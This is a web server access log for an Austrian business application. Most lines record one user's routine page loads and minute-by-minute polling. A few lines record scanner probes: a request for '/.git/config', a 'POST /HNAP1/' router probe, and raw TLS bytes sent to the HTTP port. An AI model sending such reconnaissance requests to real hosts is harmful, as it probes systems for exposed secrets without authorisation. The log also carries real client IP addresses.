3.134.109.31 - - [20/Jan/2025:09:43:42 +0100] "\x16\x03\x01" 400 383 "-" "-"
3.142.221.113 - - [20/Jan/2025:09:44:35 +0100] "\x16\x03\x01" 400 383 "-" "-"
3.142.221.113 - - [20/Jan/2025:09:45:40 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.142.221.113 - - [20/Jan/2025:09:45:44 +0100] "\x16\x03\x01" 400 383 "-" "-"
149.62.45.22 - - [20/Jan/2025:09:50:48 +0100] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
149.62.45.22 - - [20/Jan/2025:09:50:49 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Go-http-client/1.1"
156.59.198.135 - - [20/Jan/2025:09:53:31 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908081703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [20/Jan/2025:10:09:33 +0100] "GET /ed-test.activities.at/stats/lang/awstats-ar.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [20/Jan/2025:10:13:32 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101251603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.186.69 - - [20/Jan/2025:10:16:49 +0100] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:16:50 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1902 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:16:50 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:16:50 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:16:50 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:16:50 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 908 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:16:50 +0100] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:16:50 +0100] "GET /gui/javascript/form_form.js?1737364610 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:16:50 +0100] "GET /framework/webfx/javascript/statusbar/statusBar.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:16:50 +0100] "GET /gui/javascript/form_form.js?1737364610 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:16:50 +0100] "GET /gui/images/icons/cancel.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:16:50 +0100] "GET /gui/images/emptybar.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:16:50 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 934 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:16:50 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2418 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:16:51 +0100] "GET /gui/javascript/form_form.js?1737364611 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:16:51 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 1902 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:16:51 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 908 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:16:52 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 1968 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:56 +0100] "GET /gui/javascript/form_form.js?1737364676 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:56 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 989 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:56 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 2013 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/javascript/form_form.js?1737364677 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/javascript/form_form.js?1737364677 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2231 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /framework/webfx/javascript/navigation/crossbrowser.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /framework/webfx/javascript/navigation/outlook.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/images/icons/pers_einstellungen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/images/icons/i_resourcenverwaltung.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/images/icons/default_item.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/images/icons/lagerstandorte.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/images/icons/lager.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/images/icons/i_lagertransaktion.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/images/icons/grundlagen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/images/icons/rechnungswesen_einstellungen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/images/icons/i_artikel.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/images/icons/i_artikelgruppen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/images/icons/i_einzelbestellung.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/images/icons/person.png HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/images/icons/i_aktionen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/images/icons/i_aktionstypen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/images/icons/verwaltung_automarken.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/images/icons/menumanagement.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /gui/images/icons/artikelbearbeitung_verfassung.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /framework/icons/navigation/arrowup.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /framework/webfx/style/toolbar/images/cbback.gif HTTP/1.1" 404 318 "http://hausegger.activities.at/framework/webfx/style/toolbar/cb2.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /framework/icons/navigation/arrowdown.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:17:57 +0100] "GET /undefined HTTP/1.1" 404 289 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:18:57 +0100] "GET /entry.php?id=10271&&ser=364676 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:18:57 +0100] "GET /gui/javascript/form_form.js?1737364737 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=364676" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:19:57 +0100] "GET /entry.php?id=10271&&ser=364737 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=364676" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:19:57 +0100] "GET /gui/javascript/form_form.js?1737364797 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=364737" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:20:57 +0100] "GET /entry.php?id=10271&&ser=364797 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=364737" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:20:57 +0100] "GET /gui/javascript/form_form.js?1737364857 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=364797" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:21:58 +0100] "GET /entry.php?id=10271&&ser=364857 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=364797" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:21:58 +0100] "GET /gui/javascript/form_form.js?1737364918 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=364857" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:22:58 +0100] "GET /entry.php?id=10271&&ser=364918 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=364857" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:22:58 +0100] "GET /gui/javascript/form_form.js?1737364978 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=364918" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:23:17 +0100] "GET /entry.php?id=10828 HTTP/1.1" 200 9141 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:23:18 +0100] "GET /gui/javascript/form_form.js?1737364998 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:23:18 +0100] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1509 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
223.13.57.120 - - [20/Jan/2025:10:23:56 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
178.165.186.69 - - [20/Jan/2025:10:23:58 +0100] "GET /entry.php?id=10271&&ser=364978 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=364918" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:23:58 +0100] "GET /gui/javascript/form_form.js?1737365038 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=364978" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
223.13.57.120 - - [20/Jan/2025:10:23:58 +0100] "POST /HNAP1/ HTTP/1.0" 400 373 "-" "-"
178.165.186.69 - - [20/Jan/2025:10:24:59 +0100] "GET /entry.php?id=10271&&ser=365038 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=364978" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:24:59 +0100] "GET /gui/javascript/form_form.js?1737365099 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=365038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:25:59 +0100] "GET /entry.php?id=10271&&ser=365099 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=365038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:25:59 +0100] "GET /gui/javascript/form_form.js?1737365159 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=365099" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:26:59 +0100] "GET /entry.php?id=10271&&ser=365159 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=365099" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:26:59 +0100] "GET /gui/javascript/form_form.js?1737365219 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=365159" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:27:59 +0100] "GET /entry.php?id=10271&&ser=365219 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=365159" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:28:00 +0100] "GET /gui/javascript/form_form.js?1737365280 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=365219" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:29:00 +0100] "GET /entry.php?id=10271&&ser=365280 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=365219" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:29:00 +0100] "GET /gui/javascript/form_form.js?1737365340 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=365280" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:30:00 +0100] "GET /entry.php?id=10271&&ser=365340 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=365280" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:30:00 +0100] "GET /gui/javascript/form_form.js?1737365400 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=365340" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:31:00 +0100] "GET /entry.php?id=10271&&ser=365400 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=365340" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:31:01 +0100] "GET /gui/javascript/form_form.js?1737365460 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=365400" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:32:01 +0100] "GET /entry.php?id=10271&&ser=365460 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=365400" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:32:01 +0100] "GET /gui/javascript/form_form.js?1737365521 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=365460" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:33:01 +0100] "GET /entry.php?id=10271&&ser=365521 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=365460" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:33:01 +0100] "GET /gui/javascript/form_form.js?1737365581 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=365521" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
156.59.198.136 - - [20/Jan/2025:10:33:35 +0100] "GET /ed-test.activities.at/stats/lang/awstats-pl.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.186.69 - - [20/Jan/2025:10:34:01 +0100] "GET /entry.php?id=10271&&ser=365581 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=365521" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:34:01 +0100] "GET /gui/javascript/form_form.js?1737365641 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=365581" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:35:02 +0100] "GET /entry.php?id=10271&&ser=365641 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=365581" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:35:02 +0100] "GET /gui/javascript/form_form.js?1737365702 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=365641" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:36:02 +0100] "GET /entry.php?id=10271&&ser=365702 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=365641" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:36:02 +0100] "GET /gui/javascript/form_form.js?1737365762 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=365702" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:37:02 +0100] "GET /entry.php?id=10271&&ser=365762 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=365702" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:37:02 +0100] "GET /gui/javascript/form_form.js?1737365822 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=365762" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:38:03 +0100] "GET /entry.php?id=10271&&ser=365822 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=365762" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:38:03 +0100] "GET /gui/javascript/form_form.js?1737365883 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=365822" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:39:03 +0100] "GET /entry.php?id=10271&&ser=365883 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=365822" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:39:03 +0100] "GET /gui/javascript/form_form.js?1737365943 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=365883" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [20/Jan/2025:10:40:03 +0100] "GET /entry.php?id=10271&&ser=365943 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=365883" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
